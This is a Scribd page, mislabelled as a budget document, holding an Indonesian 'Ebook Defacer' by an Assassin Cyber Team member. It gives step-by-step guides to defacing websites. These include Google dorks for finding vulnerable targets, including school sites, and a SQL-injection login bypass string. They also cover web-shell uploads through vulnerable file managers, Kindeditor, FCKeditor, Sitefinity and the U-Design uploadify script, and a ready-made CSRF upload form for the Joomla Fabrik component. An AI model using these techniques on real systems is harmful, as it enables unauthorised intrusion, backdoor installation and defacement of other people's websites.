Scribd Logo
Unggah

Selamat datang di Scribd!

  • Standar Biaya Umum

    Diunggah oleh

    Wolfoty
    21 tayangan15 halaman

    Judul Asli

    standar_biaya_umum

    Hak Cipta

    © © All Rights Reserved

    Format Tersedia

    PDF, TXT atau baca online dari Scribd

    Apakah menurut Anda dokumen ini bermanfaat?

    Apakah konten ini tidak pantas?

    Laporkan Dokumen Ini

    Hak Cipta:

    © All Rights Reserved
    Unduh sebagai PDF, TXT atau baca online dari Scribd
    Tandai sebagai konten tidak pantas
    21 tayangan15 halaman

    Standar Biaya Umum

    Diunggah oleh

    Wolfoty

    Hak Cipta:

    © All Rights Reserved
    Unduh sebagai PDF, TXT atau baca online dari Scribd
    Tandai sebagai konten tidak pantas
    dari 15

    Ebook Defacer

    X-4R4Y
    1. Deface Poc Bypass Admin

    2. Deface Poc Webdav

    3. Deface Poc File Upload Manager

    3. Deface Poc Com_Fabrik With CSRF

    4. Deface Poc Kindeditor

    5. Deface Poc Balitbang

    6. Deface Web Sekolah

    7. deface Poc Sitefinity

    8. Deface Poc U-Design Themes


    Deface poc bypass admin

    Dork : inurl:/?mnux=login
    (kembangin Lagi Yaa)

    1. Dorking Dulu DI google Dengan Dork Di Atas


    2. Pilih Salah 1 Web
    3. Masukan Username & Password
    User&password : ‘=”or’
    4. Kalau Vlun Nanti Akan Masuk Ke Dashbord
    5. Klik Profile
    6. Ubah Foto Profile Dan Upload Shell Kalian
    Note : Shell Extensi .php.jpeg atau .phpXxx
    7. Kalau Berhasil Buka Klik Profile Nya , Nanti Akan Masuk Ke Shell Backdoor Kalian
    8. Tinggal Tebas Deh :v

    Done .
    Deface Poc Webdav

    1. Download Webdav / Hmei7

    2. Buka Webdav

    3. Klik Webdav

    4. Klik Asp Shell Maker

    5. Klik Setting

    6. Klik Load Shell Form File

    7. Pilih Script Deface Kalian

    8. Klik Oke

    9. Klik Add Site

    10. Masukan Link Target Yang Ingin Di Deface

    11. Lalu Klik Serang


    Kalau Berhasil Dan Vlun Nanti Akan Muncul Link Target .
    Deface Poc File Upload Manager

    Dork : "File Upload Manager v1.3" "rename to" "file types allowed"
    (kalian Kembangkan Lagi)

    1. Dorking Dulu Di Google

    2. Pilih Salah Satu Web

    3. Lalu Klik Upload Di Form Upload

    4. Pilih Script Deface Kalian

    5. Kalau Sudah Tinggal Lihat Hasil Deface Kalian

    Cara Lihat Nya


    Contoh
    www.target.com/[path]/store/X-4R4Y.htm
    Kalau Ga Ada Path Nya Tidak Usah Pakai Path Yaa :v
    Deface Poc Com_Fabrik With CSRF

    1. dorking di google

    Dork:
    inurl:index.php?option=com_fabrik
    inurl:index.php/component/fabrik/ site:
    inurl:index.php?option=com_fabrik&view= site:

    Dork Bisa Kamu Kembangin Lagi

    2. Pilih Salah Satu Web Lalu Kamu Exploit

    Exploit :
    /index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=a
    jax_upload

    Contoh :
    www.target.com/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileu
    pload&method=ajax_upload

    Kalau Vlun Ada Bacaan Not Pulished


    3. Buka notepad Lalu Copy Script Di Bawah

    <title>~ACT~</title>
    <center> <body><img alt="Gambar Koala" src="https://4.bp.blogspot.com/-
    9PXpouwGn2A/Wmfq3SmQT9I/AAAAAAAAAAg/ZqsgdcxDL74SbN2oiOFmFbuo-
    9ma9wSSQCPcBGAYYCw/s1600/IMG-20180122-WA0030.jpg"/>

    <br>
    <br>
    <font size="10">CSRF ASSASSIN CYBER TEAM </h1><br><br>
    <form method="POST" action=" Di sini Link Website atau Domain
    Website/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&m
    ethod=ajax_upload" enctype="multipart/form-data">
    <input type="file" name="file"><button>Upload</button>
    </form>
    </center><br></font>

    Contoh :

    <title>~ACT~</title>
    <center> <body><img alt="Gambar Koala" src="https://4.bp.blogspot.com/-
    9PXpouwGn2A/Wmfq3SmQT9I/AAAAAAAAAAg/ZqsgdcxDL74SbN2oiOFmFbuo-
    9ma9wSSQCPcBGAYYCw/s1600/IMG-20180122-WA0030.jpg"/>

    <br>
    <br>
    <font size="10">CSRF ASSASSIN CYBER TEAM </h1><br><br>
    <form method="POST"
    action="http://www.portofcall.com/index.php?option=com_fabrik&format=raw&task=plugin.plugi
    nAjax&plugin=fileupload&method=ajax_upload" enctype="multipart/form-data">
    <input type="file" name="file"><button>Upload</button>
    </form>
    </center><br></font>

    4. Jika Sudah Save Csrf Nya Dengan Nama csrf.html

    5. Buka File csrf Nya , Lalu Upload .htaccess yang ada di file , Lalu Back Kehalaman Yang Tadi , Lalu
    Upload Shell.php Mu
    6. Sudah Terupload Saat Nya Tebas Index

    7. lalu Masukan exploit ini


    /media/namashellmu.php
    Contoh :
    www.target.com/media/X-4R4Y.php

    8. jika Cari Bacaan index.php


    9. Klik Edit

    10. Lalu Hapus Semua Script Nya

    11. Salin Script Mu Dan Paste Di Website Nya .

    12. Lalu Klik Go .


    Done
    Deface Poc Kindeditor

    Dork : inurl:examples/uploadbutton.html
    (kembangin Lagi)

    1. Dorking Google

    2. Pilih Salah Satu Web

    3. Klik Upload

    4. Pilih Script Deface Kalian

    5. Lalu Oke

    6. Kalau Vlun Atau Berhasil Nanti Akan Muncul Exploit

    7. Tambahkan Exploit Ke Link Website


    Contoh
    www.target.com/examples/uploadbutton.html
    ubah Jadi
    www.target.com/exploitKalian
    Deface Poc biltbang
    Dork : inurl:/member/daftar.php
    1.Dorking Dulu Di Google
    2.Pilih Salah Satu Target Dan Masukan Exploit ini : /member/daftar.php
    Contoh:http://www.target.com/member/daftar.php
    4.Lalu isi kan kotak yang kosong itu ,dan klik Daftar/Simpan
    6.Setelah itu kita buka email kita(emailyangtadibuatdaftarjadimember)
    7.Lalu lihat di Kotak Masuk/di SPAM, lalu kita klik Validasi Member
    9.Lalu klik Lanjutkan ,dan masukan Username dan Passwordnya;)
    10.Setelah kita masuk ,lalu buka CSRF nya
    CSRF Download Di Google Aee :v
    11.Copy(WebDepan/WebSekolahnya)dan paste web nya ke CSRF
    12.Setelah itu, kita save dan buka CSRF nya,
    13.Setelah itu, tinggal pasang shell backdoor kalian dan klik Upload:
    14.Lalu Klik Upload
    15. Lalu Tambahkan Exploit Untuk Akses Shell Nya : /materi/file.php
    Contoh : www.target.com/materi/ACT.php
    Deface Web Sekolah

    Dork : inurl:”/html/siswa.php?”
    Inurl:”/html/guru.php?”
    Inurl:”/html/alumni.php?”

    1. Dorking Google

    2. Pilih Salah Satu Web

    3. Masukan Exploit
    /editor/filemanager/connector/test.html
    Atau
    /editor/filemanager/connector/uploadtest.html

    4. Tinggal Upload
    Upload Extensi (txt,jpg,png,jpeg,dll)

    5. Untuk Lihat Hasil Nya Tinggal Tambahkan Exploit


    /Userfiles/namafileyangdiupload
    Atau
    /userfiles/files/namafileyangdiupload
    Contoh : www.target.com/Userfile/files/X-4R4Y.txt
    Deface Poc Sitefinity

    Dork : inurl:sitefinity/login site:org

    1. Seperti Biasa Eaa Dorking Dulu

    2. Pilih Web Nya

    3. Masukan Exploit

    /sitefinity/UserControls/dialog/DocumentEditorDialog.aspx

    4. Kalau Vlun Muncul From Upload

    5. Upload Scipt Deface Kalian

    6. Klik Oke

    7. Untuk Lihat Hasil Masukan Exploit /files/namasc.html


    Contoh : www.target.org/files/X-4R4Y.html

    Done Eaa :v
    Deface Poc U-Design Themes

    Dork : inurl:themes/u-design/ext:jpgimage
    indexof/''''uploadify.php''''wp-content
    Exploit : :/wp-content/themes/u-design//scripts/admin/uploadify/uploadify.php
    1. Dorking Di Google

    2. Pilih Salah Satu Web

    3. Masukan Exploit ( Exploit Di Atas Noh :v )

    4. Kalau Web Nya Blank Putih Berarti Vlun

    5. Lalu Buka http://itloker.com/capca.php

    6. Lalu Masukan Link Website

    7. Klik Upload dan Crootz :v

    8. lalu Ada our Bitch buka link itu Jika ada Angka 1 Shell Kalian Sudah teruploud

    9.Untuk Akses Shell Kalian Masukan Exploit /NamaShell.php


    Contoh : www.target.com/X-4R4Y.php
    Note Penutup

    Semoga Tutorial Yang w Berikan Berguna Eaaa :v

    Sekian Dari w X-4R4Y :v


    Jangan Lupa Kunjungi Juga Blog w
    http://assassin-cyber-team.blogspot.com
    Kunjungi Juga Fanspage ACT
    @AssassinCyberTeam

    Anda mungkin juga menyukai